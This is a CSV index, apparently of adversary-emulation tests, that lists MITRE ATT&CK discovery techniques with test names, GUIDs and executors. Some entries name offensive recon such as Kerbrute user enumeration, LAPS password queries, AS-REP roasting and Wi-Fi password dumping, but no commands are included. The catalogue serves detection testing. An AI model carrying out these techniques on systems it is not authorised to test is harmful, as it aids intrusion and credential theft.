discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1033,System Owner/User Discovery,7,System Owner/User Discovery Using Command Prompt,ba38e193-37a6-4c41-b214-61b33277fe36,command_prompt
discovery,T1613,Container and Resource Discovery,1,Docker Container and Resource Discovery,ea2255df-d781-493b-9693-ac328f9afc3f,sh
discovery,T1613,Container and Resource Discovery,2,Podman Container and Resource Discovery,fc631702-3f03-4f2b-8d8a-6b3d055580a1,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,1,Check internet connection using ping Windows,e184b6bd-fb28-48aa-9a59-13012e33d7dc,command_prompt
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,3,Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping),f8160cde-4e16-4c8b-8450-6042d5363eb0,powershell
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,4,Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP),7c35779d-42ec-42ab-a283-6255b28e9d68,powershell
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,5,Check internet connection using Test-NetConnection in PowerShell (TCP-SMB),d9c32b3b-7916-45ad-aca5-6c902da80319,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1652,Device Driver Discovery,1,Device Driver Discovery,235b30a2-e5b1-441f-9705-be6231c88ddd,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
discovery,T1087.002,Account Discovery: Domain Account,18,Suspicious LAPS Attributes Query with Get-ADComputer all properties,394012d9-2164-4d4f-b9e5-acf30ba933fe,powershell
discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property,6e85bdf9-7bc4-4259-ac0f-f0cb39964443,powershell
discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
discovery,T1087.002,Account Discovery: Domain Account,24,Account Enumeration with LDAPDomainDump,a54d497e-8dbe-4558-9895-44944baa395f,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Account Discovery: Local Account,11,ESXi - Local Account Discovery via ESXCLI,9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,7,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1040,Network Sniffing,16,PowerShell Network Sniffing,9c15a7de-de14-46c3-bc2a-6d94130986ae,powershell
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh
discovery,T1135,Network Share Discovery,4,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,5,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,6,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,7,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,8,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,9,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1135,Network Share Discovery,10,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
discovery,T1135,Network Share Discovery,11,Enumerate All Network Shares with SharpShares,d1fa2a69-b0a2-4e8a-9112-529b00c19a41,powershell
discovery,T1135,Network Share Discovery,12,Enumerate All Network Shares with Snaffler,b19d74b7-5e72-450a-8499-82e49e379d1a,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1120,Peripheral Device Discovery,3,Peripheral Device Discovery via fsutil,424e18fd-48b8-4201-8d3a-bf591523a686,command_prompt
discovery,T1120,Peripheral Device Discovery,4,Get Printer Device List via PowerShell Command,5c876daf-db1e-41cf-988d-139a7443ccd4,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh
discovery,T1082,System Information Discovery,7,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
discovery,T1082,System Information Discovery,9,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,10,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,11,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,13,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1082,System Information Discovery,14,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,15,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,16,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,17,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,18,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,19,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,20,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,23,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1082,System Information Discovery,24,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
discovery,T1082,System Information Discovery,27,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
discovery,T1082,System Information Discovery,28,System Information Discovery,4060ee98-01ae-4c8e-8aad-af8300519cc7,command_prompt
discovery,T1082,System Information Discovery,29,Check computer location,96be6002-9200-47db-94cb-c3e27de1cb36,command_prompt
discovery,T1082,System Information Discovery,30,BIOS Information Discovery through Registry,f2f91612-d904-49d7-87c2-6c165d23bead,command_prompt
discovery,T1082,System Information Discovery,31,ESXi - VM Discovery using ESXCLI,2040405c-eea6-4c1c-aef3-c2acc430fac9,command_prompt
discovery,T1082,System Information Discovery,32,ESXi - Darkside system information discovery,f89812e5-67d1-4f49-86fa-cbc6609ea86a,command_prompt
discovery,T1082,System Information Discovery,33,sysctl to gather macOS hardware info,c8d40da9-31bd-47da-a497-11ea55d1ef6c,sh
discovery,T1082,System Information Discovery,34,operating system discovery ,70e13ef4-5a74-47e4-9d16-760b41b0e2db,powershell
discovery,T1082,System Information Discovery,35,"Check OS version via ""ver"" command",f6ecb109-df24-4303-8d85-1987dbae6160,command_prompt
discovery,T1082,System Information Discovery,36,"Display volume shadow copies with ""vssadmin""",7161b085-816a-491f-bab4-d68e974b7995,command_prompt
discovery,T1082,System Information Discovery,37,Identify System Locale and Regional Settings with PowerShell,ce479c1a-e8fa-42b2-812a-96b0f2f4d28a,command_prompt
discovery,T1082,System Information Discovery,38,Enumerate Available Drives via gdr,c187c9bc-4511-40b3-aa10-487b2c70b6a5,command_prompt
discovery,T1082,System Information Discovery,39,Discover OS Product Name via Registry,be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7,command_prompt
discovery,T1082,System Information Discovery,40,Discover OS Build Number via Registry,acfcd709-0013-4f1e-b9ee-bc1e7bafaaec,command_prompt
discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,6,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,8,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1217,Browser Bookmark Discovery,9,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1217,Browser Bookmark Discovery,10,Extract Edge Browsing History,74094120-e1f5-47c9-b162-a418a0f624d5,powershell
discovery,T1217,Browser Bookmark Discovery,11,Extract chrome Browsing History,cfe6315c-4945-40f7-b5a4-48f7af2262af,powershell
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
discovery,T1619,Cloud Storage Object Discovery,4,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
